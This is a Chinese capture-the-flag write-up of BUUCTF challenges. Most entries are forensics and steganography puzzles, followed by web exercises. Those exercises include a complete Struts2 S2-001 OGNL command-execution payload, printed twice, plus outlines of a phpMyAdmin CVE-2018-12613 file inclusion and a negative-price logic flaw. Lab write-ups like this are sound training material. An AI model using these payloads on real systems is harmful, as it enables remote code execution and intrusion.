BUUCTF-做题记录

很久没做题了,还是随便来水一水吧,之前都在学别的。

[INSHack2017]remote-multimedia-controller

在这里插入图片描述
流量包,因此选择直接搜看有没有flag
在这里插入图片描述
针对该流进行tcp流的跟踪。
在这里插入图片描述
发现存在一个特殊字符串,用CyberChef直接梭
在这里插入图片描述
flag:

flag{TCP_s0ck3t_4n4lys1s_c4n_b3_fun!}

[INSHack2017]hiding-in-plain-sight

在这里插入图片描述
直接用tokeii👴网站的工具
在这里插入图片描述
然后将foremost后的结果进行下载。
在这里插入图片描述
得到隐藏的flag
在这里插入图片描述
flag:

flag{l337_h4xx0r5_c0mmun1c473_w17h_PNGs}

[QCTF2018]X-man-Keyword

在这里插入图片描述
查看lsb,发现通道内有东西,直接用脚本解得到一串字符。

PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf}

根据lovekfc,然后进行关键字解密
在这里插入图片描述
再根据大小写修改一一对应的位置,得到真正的flag

flag{cCgeLdnrIBCX9G1g13KFfeLNsnMRdOwf}

[BSidesSF2019]diskimage

在这里插入图片描述

老样子zsteg梭一下
在这里插入图片描述
提取出该数据
在这里插入图片描述
然后利用kali自带的testdisk提取其中的图片

testdisk 1.dat

在这里插入图片描述
把这个图片重命名为1.png打开得到flag
在这里插入图片描述
flag:

flag{FAT12_FTW}

[2022红包题]虎年大吉

在这里插入图片描述
工具题,用ciphey直接解
在这里插入图片描述
flag:

flag{29186995}

[WMCTF2020]行为艺术

在这里插入图片描述
打开后有hint.txt,内容

md5sum flag.zip
17f5b08342cf65f6dc08ed0b4c9bd334 flag.zip

另一个文件则是一个图片,里面有504B开头,盲猜应该是一个压缩包的十六进制,但是好像没看见尾部,所以修改图片的高度。
在这里插入图片描述
得到完整的图片
在这里插入图片描述
提取出来得到

504B0304140000000800DB93C55086A39007D8000000DF01000008000000666C61672E74787475504B0E823010DD93708771DDCCB0270D5BBD0371815A9148AC6951C2ED9D271F89C62E2693D7F76BB7DE9FC80D2E6E68E782A326D2E01F81CE6D55E76972E9BA7BCCB3ACEF7B89F7B6E90EA16A6EE2439D45179ECDD1C5CCFB6B9AA489C1218C92B898779D765FCCBB58CC920B6662C5F91749931132258F32BBA7C288C5AE103133106608409DAC419F77241A3412907814AB7A922106B8DED0D25AEC8A634929025C46A33FE5A1D3167A100323B1ABEE4A7A0708413A19E17718165F5D3E73D577798E36D5144B66315AAE315078F5E51A29246AF402504B01021F00140009000800DB93C55086A39007D8000000DF010000080024000000000000002000000000000000666C61672E7478740A00200000000000010018004A0A9A64243BD601F9D8AB39243BD6012D00CA13223BD601504B050600000000010001005A000000FE00000000000000

在这里插入图片描述
得到加密后的zip文件。
利用010查看发现是一个伪加密,修改对应的位由09改为00
在这里插入图片描述
打开后有一个典型的brainfuck编码
在这里插入图片描述
利用网站一把梭
在这里插入图片描述
flag:

flag{wai_bi_baaaa_bo!2333~~~}

[MRCTF2020]寻找xxx

在这里插入图片描述
打开来有个wav,里面是拨号音,直接丢在线解码工具进行解,得到号码。
(由于在BUUCTF进行复现,所以只能做到这一步)
在这里插入图片描述
flag去网上随便找的

flag{Oh!!!!!_Y0u_f1nd_my_secret}

[ThinkPHP]IN SQL INJECTION

在这里插入图片描述
利用payload获取数据库名
在这里插入图片描述
然后在爆破信息里面就有flag了
在这里插入图片描述

[PHPMYADMIN]CVE-2018-12613

在这里插入图片描述
先利用sql执行输入phpinfo
在这里插入图片描述
查看一下session的 值
在这里插入图片描述
由于session已经进行了存储,因此可以直接访问session 的文件得到phpinfo()
在这里插入图片描述
查到flag
在这里插入图片描述

[struts2]s2-001

在这里插入图片描述

利用payload实现命令执行
在这里插入图片描述
在password框内输入要执行的命令
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

根据经验,一般都在env环境变量当中有flag
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

[第三章 web进阶]逻辑漏洞

在这里插入图片描述
打开一个登陆界面,然后随便输入admin/123进行登陆
在这里插入图片描述
进入后有个卖书的位置
在这里插入图片描述
直接买flag买不起
在这里插入图片描述
尝试购买nice,发现可以购买
在这里插入图片描述
利用购买的成功请求包,将cost参数改成复数。
在这里插入图片描述
改成-9999
在这里插入图片描述
重新购买得到flag
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值